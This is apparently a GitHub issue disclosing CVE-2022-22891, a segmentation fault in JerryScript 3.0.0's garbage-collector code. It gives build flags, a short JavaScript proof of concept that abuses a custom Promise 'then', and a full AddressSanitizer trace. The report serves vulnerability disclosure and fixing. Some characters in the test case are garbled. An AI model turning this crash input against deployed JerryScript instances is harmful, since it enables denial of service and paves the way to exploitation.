Headline
CVE-2022-22891: SEGV in ecma_ref_object_inline of ecma-gc.c · Issue #4871 · jerryscript-project/jerryscript
Jerryscript 3.0.0 was discovered to contain a SEGV vulnerability via ecma_ref_object_inline in /jerry-core/ecma/base/ecma-gc.c.
JerryScript revision
Commit: 51da1551 Version: v3.0.0
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
./tools/build.py --clean --debug --profile=es2015-subset --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20
Test case
function echo(str) { console.log(str); }
function T(p, r, u) { return Object.assign(p, { then(onFulfilled, onRejected) { if (u) { onFulfilled®; } else { onFulfilled(); }
return Promise.prototype.then.call(this, onFulfilled, onRejected);
}
}); }
function JSEtest(i) { var ps = [T(Promise.resolve(‘success’))]; Promise.all(ps).then(res => { echo(`Test #${i} - Success with ‘${res}’ (length = ${res.length}) (isArray = ${Array.isArray(res)})`); }).catch(err => { echo(`Test #${i} - Catch with ${err}`); }); }
JSEtest(1);
Execution steps & Output
$ ./jerryscript/build/bin/jerry poc.js
ASAN:DEADLYSIGNAL
==95503==ERROR: AddressSanitizer: SEGV on unknown address 0x41b58ab0 (pc 0x566075cf bp 0x1ff7c4b0 sp 0xffbe2500 T0) ==95503==The signal is caused by a READ memory access. #0 0x566075ce in ecma_ref_object_inline /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:136 #1 0x56639c0c in ecma_copy_value /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:913 #2 0x56639c0c in ecma_fast_copy_value /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:940 #3 0x566cdd0b in ecma_op_object_find_own /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:647 #4 0x566d2ea0 in ecma_op_object_find_own /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:494 #5 0x566d2ea0 in ecma_op_object_get_with_receiver /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:879 #6 0x567ef0cf in ecma_op_array_get_to_string_at_index /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:273 #7 0x567ef0cf in ecma_builtin_array_prototype_join /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:322 #8 0x567ef0cf in ecma_builtin_array_prototype_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2940 #9 0x566731f1 in ecma_builtin_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1543 #10 0x566731f1 in ecma_builtin_dispatch_call /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1574 #11 0x566b48b4 in ecma_op_function_call_native_built_in /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1243 #12 0x566bae4d in ecma_op_function_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1444 #13 0x5668d365 in ecma_array_object_to_string /root/jerryscript/jerry-core/ecma/operations/ecma-array-object.c:1228 #14 0x5681e945 in ecma_builtin_intrinsic_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-intrinsic.c:201 #15 0x566731f1 in ecma_builtin_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1543 #16 0x566731f1 in ecma_builtin_dispatch_call /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1574 #17 0x566b48b4 in ecma_op_function_call_native_built_in /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1243 #18 0x566bae4d in ecma_op_function_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1444 #19 0x566c9572 in ecma_op_general_object_ordinary_value /root/jerryscript/jerry-core/ecma/operations/ecma-objects-general.c:319 #20 0x566c976b in ecma_op_general_object_default_value /root/jerryscript/jerry-core/ecma/operations/ecma-objects-general.c:284 #21 0x566d6875 in ecma_op_object_default_value /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:1780 #22 0x566a905a in ecma_op_to_string /root/jerryscript/jerry-core/ecma/operations/ecma-conversion.c:456 #23 0x567b3433 in vm_loop /root/jerryscript/jerry-core/vm/vm.c:2820 #24 0x567e21da in vm_execute /root/jerryscript/jerry-core/vm/vm.c:5260 #25 0x567e7e7c in vm_run /root/jerryscript/jerry-core/vm/vm.c:5363 #26 0x566b4101 in ecma_op_function_call_simple /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1203 #27 0x566bae25 in ecma_op_function_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1439 #28 0x566c495e in ecma_process_promise_reaction_job /root/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:221 #29 0x566c495e in ecma_process_all_enqueued_jobs /root/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:563 #30 0x565d4dbc in jerry_run_jobs /root/jerryscript/jerry-core/api/jerryscript.c:1064 #31 0x565c004b in main /root/jerryscript/jerry-main/main-jerry.c:326 #32 0xf76f1f20 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18f20) #33 0x565c9359 (/root/jerryscript/build/bin/jerry+0x3b359)
AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:136 in ecma_ref_object_inline ==95503==ABORTING
Credits: Found by OWL337 team.